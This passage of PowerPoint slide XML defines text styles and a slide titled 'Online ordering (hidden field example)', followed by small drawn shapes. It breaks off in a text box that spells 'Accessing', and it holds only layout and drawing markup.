                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="456396" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="912793" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="1369188" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="1825584" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="877928" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" kern="0" spc="15"/>
              <a:t>Online</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" kern="0" spc="60"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" kern="0" spc="85"/>
              <a:t>ordering (hidden field example)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3600" kern="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object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB2F858E-5400-F04B-BDA0-2DFC81342275}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7869238" y="734853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19" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68798882-9993-1E49-A550-D2AC16987B33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="767556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820" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="177820" y="38099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203210" y="19049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17782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7220" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9667D78E-1C55-3D47-85E0-B9DCC49BE189}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842250"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1" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8A0BD62-B9D9-1045-8C2D-E8CE7BB18A96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7869238" y="737711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2" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBE6927A-FDCD-DB4C-A74C-FB12A8AE6437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842250"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3" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AA93305-A58B-A04B-9010-56298CBD0D24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="786923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4" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF8A661E-9266-4D42-AECB-EC9663D08E1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8443913" y="7319963"/>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5" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26DB88F4-7EE5-C647-968F-83BA06DA532F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8472488" y="7362825"/>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6" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EF85463-69A1-AD4B-92A2-89339DA6BB94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8278813" y="7334250"/>
            <a:ext cx="442912" cy="85725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 203200"/>
              <a:gd name="T1" fmla="*/ 0 h 38100"/>
              <a:gd name="T2" fmla="*/ 0 w 203200"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 38100"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 203200"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 38100"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 203200"/>
              <a:gd name="T7" fmla="*/ 0 h 38100"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 203200"/>
              <a:gd name="T9" fmla="*/ 0 h 38100"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 203200"/>
              <a:gd name="T11" fmla="*/ 2147483646 h 38100"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 203200"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 38100"/>
              <a:gd name="T14" fmla="*/ 2147483646 w 203200"/>
              <a:gd name="T15" fmla="*/ 0 h 381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200" h="38100">
                <a:moveTo>
                  <a:pt x="25389" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="19049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25389" y="38099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25389" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="203200" h="38100">
                <a:moveTo>
                  <a:pt x="177789" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="177789" y="38099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203179" y="19049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1777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7227" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47FDAECF-DF3C-DF46-AAAA-79627FB21C75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8443913" y="7405688"/>
            <a:ext cx="84137"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8" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AB9E68D-BCE9-7547-B153-0890351EE31E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8472488" y="74342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CCCC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29" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{270DD95C-CE66-E74A-89B8-57E11EE11884}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9043988" y="7319963"/>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0" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFB8A0C8-6002-474D-9577-C9437DD36AB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9070975" y="7362825"/>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20295">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1" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75AFC6E9-764E-5A4C-9A82-B1B0B7DC5A3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9043988" y="7405688"/>
            <a:ext cx="82550"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2" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C08BE171-C1F8-1849-ACE7-7EDDA0664171}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9070975" y="7434263"/>
            <a:ext cx="84138" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 38100"/>
              <a:gd name="T1" fmla="*/ 2147483646 w 38100"/>
              <a:gd name="T2" fmla="*/ 0 60000 65536"/>
              <a:gd name="T3" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T2">
                <a:pos x="T0" y="0"/>
              </a:cxn>
              <a:cxn ang="T3">
                <a:pos x="T1" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="38100">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38099" y="0"/>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3" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1441A9B9-6A94-9549-B671-94E0BC082CF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9712325" y="7391400"/>
            <a:ext cx="44450" cy="42863"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 20320"/>
              <a:gd name="T1" fmla="*/ 0 h 20320"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 20320"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 20320"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T4">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T5">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="20320" h="20320">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20330" y="20311"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="7591">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4" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F743A6B-2B06-8D42-8200-51FA37EDAB84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9653588" y="7331075"/>
            <a:ext cx="65087" cy="66675"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T5" fmla="*/ 0 h 30479"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T7" fmla="*/ 0 h 30479"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T9" fmla="*/ 0 h 30479"/>
              <a:gd name="T10" fmla="*/ 0 w 30479"/>
              <a:gd name="T11" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T12" fmla="*/ 0 w 30479"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T14" fmla="*/ 0 w 30479"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T16" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T17" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T18" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T19" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T20" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T21" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T22" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T23" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T24" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T25" fmla="*/ 2147483646 h 304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479" h="30479">
                <a:moveTo>
                  <a:pt x="30388" y="15180"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="30388" y="6798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23591" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15179" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6797" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6797" y="30373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15179" y="30373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23591" y="30373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30388" y="23574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30388" y="15180"/>
                </a:lnTo>
                <a:close/>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5" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CE6E9B7-3A08-1C4B-A701-4F05F19E4A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9480550" y="7323138"/>
            <a:ext cx="103188" cy="114300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T11" fmla="*/ 0 h 50164"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T14" fmla="*/ 2035069958 w 48260"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T16" fmla="*/ 0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5096" y="49699"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38471" y="45808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47750" y="35706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47067" y="17943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41428" y="6143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32268" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15804" y="2163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4953" y="9550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20495"/>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6" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9781CEE3-438D-2040-8891-0198A388603B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9445625" y="7362825"/>
            <a:ext cx="65088"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7" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{904866E7-733B-0C46-849A-D0F2D870CDD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9815513" y="7323138"/>
            <a:ext cx="107950" cy="114300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T4" fmla="*/ 0 w 48260"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T6" fmla="*/ 621453573 w 48260"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T11" fmla="*/ 0 h 50164"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T14" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T16" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T17" fmla="*/ 2147483646 h 50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60" h="50164">
                <a:moveTo>
                  <a:pt x="22697" y="49705"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9214" y="45814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="711" y="17940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6370" y="6138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15544" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32001" y="2169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42849" y="9563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47796" y="20516"/>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238" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAC603B6-9C50-8147-9B68-7357AB4FBB87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9888538" y="7362825"/>
            <a:ext cx="66675" cy="28575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T1" fmla="*/ 0 h 12700"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 12700"/>
              <a:gd name="T4" fmla="*/ 0 w 30479"/>
              <a:gd name="T5" fmla="*/ 0 h 12700"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="30479" h="12700">
                <a:moveTo>
                  <a:pt x="30479" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15239" y="12704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="5060">
            <a:solidFill>
              <a:srgbClr val="98989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object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65DCE015-5E4F-F04D-82C4-0CDAB3D7165A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234950" y="223838"/>
            <a:ext cx="4337050" cy="477837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="82768" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3100" spc="243" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Acc</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-221" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ss</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="11" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="409" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
